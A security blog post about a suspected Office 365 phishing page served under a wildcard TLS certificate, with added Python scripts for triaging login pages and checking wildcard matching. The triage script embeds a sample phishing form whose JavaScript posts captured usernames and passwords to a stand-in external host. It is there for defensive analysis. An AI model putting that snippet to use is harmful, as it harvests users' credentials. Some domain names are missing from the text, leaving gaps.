Have Cyber Attackers Impersonated Microsoft’s Domain with Bogus Certificates?

May 8, 2019 | Guest Blogger: Kim Crawley


A lot of interesting finds can be discovered on Twitter. A security researcher found a webpage on for Office 365 that uses a TLS certificate which appears to be very suspicious.


What’s that * subdomain?


JavaScript code related to the page sends a user’s sensitive authentication credentials to


I decided to take the plunge and see what the website hosted through the was all about. It appeared to be a Turkish retailer of some sort.


I plugged their “About” page into Google Translate, as I don’t understand Turkish.


I can only speculate as to what’s going on with Microsoft’s domain and the domain of this Turkish glass retailer. But most likely Microsoft is being impersonated by cyber attackers. Microsoft is one of the biggest tech companies in the world. Even if you prefer to use Macs or Linux, I can pretty much guarantee that you’ve directly used their software at some point. And we also use their software indirectly through platforms like Microsoft IIS web servers, Windows Server operating systems, and Microsoft Azure cloud servers. They may have started on the client frontend in the 80s with MS-DOS and Windows, but for decades they have had a significant presence on the backend too. Their 2018 revenue was about $110.36 billion USD, and they employ many of the top minds in the computing industry. I’m confident that they wouldn’t knowingly collaborate with cyber attackers, and would think they’re securing their TLS certificates and all of their public key infrastructures like Fort Knox.

But the only reasonable assumption here is that cyber attackers have indeed impersonated their TLS systems and domain. And the * subdomain may be one that cyber attackers have created themselves. A certificate cannot be altered after issuance without invalidating the CA's signature, so "modifying" a stolen certificate is not a practical route; the realistic options are stealing a certificate together with its private key, or simply obtaining a new one. Most likely, they were able to get a wildcard certificate for * issued to themselves: a public CA will issue one to whoever can prove control of the domain, for example by answering an HTTP or DNS validation challenge, so control of the site or its DNS is all that is needed.


The JavaScript on what's likely the cyber attacker's phishing webpage for credential collection isn't obfuscated at all: we can clearly see that passwords that go through that form are being sent to an address with the domain.
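An added example, not code from the original post: a small Python triage script that parses a constructed look-alike login page (the markup, hostnames and script are invented for illustration) and lists every URL its form and inline script can send data to, flagging the ones on a different registrable domain from the page itself. It is the check the author did by eye when reading the unobfuscated JavaScript, done mechanically.

```python
"""Triage a captured login page: list every destination its form and
inline scripts can send data to, and flag those on a different
registrable domain than the page itself."""

import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page; stands in for the Office 365 look-alike in the post.
PAGE_URL = "https://login.microsoft-lookalike.test/office365/"
SAMPLE_HTML = """
<html><body>
<form id="login" action="/submit.php" method="post">
  <input name="loginfmt"><input name="passwd" type="password">
</form>
<script>
  document.getElementById("login").onsubmit = function (e) {
    e.preventDefault();
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https://shop.glass-retailer.test/api/collect.php");
    xhr.send(JSON.stringify({u: loginfmt.value, p: passwd.value}));
    location.href = "https://login.microsoftonline.com/";
  };
</script>
</body></html>
"""

# Quoted absolute http(s) URLs or root-relative paths inside script text.
URL_RE = re.compile(r"""["'](https?://[^"'\s]+|/[^"'\s]*)["']""")


class _Collector(HTMLParser):
    """Collect form actions and URL literals found inside <script> blocks."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.script_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.form_actions.append(attrs["action"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def registrable_domain(host: str) -> str:
    """Crude last-two-labels approximation; a real tool would use the public suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def find_outbound_urls(page_url: str, html: str) -> list:
    """Return each destination as {'url': ..., 'cross_domain': bool}."""
    collector = _Collector()
    collector.feed(html)
    own = registrable_domain(urlsplit(page_url).hostname or "")
    results = []
    for raw in collector.form_actions + collector.script_urls:
        url = urljoin(page_url, raw)  # resolve relative actions against the page
        host = urlsplit(url).hostname or ""
        results.append({"url": url, "cross_domain": registrable_domain(host) != own})
    return results


if __name__ == "__main__":
    for item in find_outbound_urls(PAGE_URL, SAMPLE_HTML):
        flag = "CROSS-DOMAIN" if item["cross_domain"] else "same domain"
        print(f"{flag:13} {item['url']}")
```

The redirect to the real Microsoft login also shows up as cross-domain, which is exactly what a phishing page does after harvesting credentials; the analyst still has to read which URL receives the POST.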

Is the Turkish ecommerce site for glass retailing a front for cyber crime? Why is an online store being delivered through plaintext HTTP? I’m not going to try to buy something to see if customer transaction data is sent through HTTPS. Perhaps it isn’t. Perhaps it is. It’s not worth the risk for me.

I think the more probable scenario is that the Turkish glass retailer's site isn't a front for cyber crime; rather, the cyber attackers may have hijacked the domain to route their data transmissions. I mean, come on! A web store that uses HTTP?

Hopefully someone has reported this phishing incident to Microsoft.

The * subdomain in the cyber attackers' TLS certificate marks it as a wildcard type. Any label can be used in the first part of the subdomain, as * is a wildcard. It could be whatever you want. One caveat: under the matching rules browsers follow (RFC 6125), the wildcard covers exactly one label, so a certificate for *.example.com is accepted for login.example.com but not for the bare example.com or for a.b.example.com, and only when * is the entire left-most label.
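As an added illustration, not code from the original post, the following Python function applies the single-label wildcard rule from RFC 6125 section 6.4.3 to a constructed SAN list. The domain names in it are made up and stand in for the retailer's real domain; it shows which hostnames a wildcard entry actually lets an attacker impersonate and which it does not.

```python
"""Decide which hostnames a certificate's dNSName SAN entries cover,
applying the single-label wildcard rule from RFC 6125 section 6.4.3."""

import re
from typing import Iterable, List

# Constructed SAN list for illustration; not taken from the certificate in the post.
SAMPLE_SANS = ["*.example-retailer.test", "example-retailer.test"]

_LABEL_RE = re.compile(r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?")


def _label_ok(label: str) -> bool:
    return bool(_LABEL_RE.fullmatch(label))


def san_matches(pattern: str, hostname: str) -> bool:
    """Return True if one dNSName SAN entry matches hostname.

    Rules applied:
      * comparison is case-insensitive and ignores a trailing dot;
      * '*' is honoured only as the complete left-most label, so
        'lo*.example.test' is not a wildcard at all;
      * the wildcard matches exactly one label: '*.a.b' matches 'x.a.b'
        but neither 'a.b' nor 'y.x.a.b';
      * a wildcard needs at least two labels to its right, so '*.test' is rejected.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if not pattern or not hostname:
        return False
    host_labels = hostname.split(".")
    if not all(_label_ok(lbl) for lbl in host_labels):
        return False
    if "*" not in pattern:
        return pattern == hostname
    pat_labels = pattern.split(".")
    if pat_labels[0] != "*" or any("*" in lbl for lbl in pat_labels[1:]):
        return False
    if len(pat_labels) < 3:
        return False
    if len(host_labels) != len(pat_labels):
        return False
    return host_labels[1:] == pat_labels[1:]


def covered_by(sans: Iterable[str], hostname: str) -> List[str]:
    """Return the SAN entries that would make a certificate valid for hostname."""
    return [s for s in sans if san_matches(s, hostname)]


if __name__ == "__main__":
    for name in ["login.example-retailer.test",
                 "office365.example-retailer.test",
                 "example-retailer.test",
                 "deep.login.example-retailer.test",
                 "login.example-retailer.test.evil.test"]:
        print(f"{name:40} -> {covered_by(SAMPLE_SANS, name)}")
```

Note that a public wildcard is exactly what lets an attacker who controls the zone stand up a fresh, convincingly named subdomain without going back to the CA for another certificate.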

Last October, David Bisson recommended that organizations cease using wildcard certificates. He wrote:

“Clearly, attackers are comfortable with using wildcard certificates for phishing email attacks and other attacks. Fortunately, security controls and solutions can help block an attack. By putting these defenses in place, you increase the effort that a malicious actor must take to compromise your network. Your goal is to make compromising your network so expensive that cyber-criminals would rather focus their attention on someone else. As the saying goes: When a lion chases you, you don’t need to be the fastest runner; you just have to be faster than the person behind you.

You can make your organization more costly to exploit by avoiding wildcard certificates. Although wildcard certificates make business operations simpler, they provide tremendous opportunity to any cyber-criminal who compromises your webserver or steals a wildcard certificate’s private key.”

Maybe Microsoft got into the habit of using wildcard certificates and opened an opportunity for cyber attackers who want to spoof their web apps and websites. As for the website, there’s nothing about it that looks at all secure.



About the author

Guest Blogger: Kim Crawley

Kim Crawley writes about all areas of cybersecurity, with a particular interest in malware and social engineering. In addition to Venafi, she also contributes to Tripwire, AlienVault, and Cylance’s blogs. She has previously worked for Sophos and Infosecurity Magazine.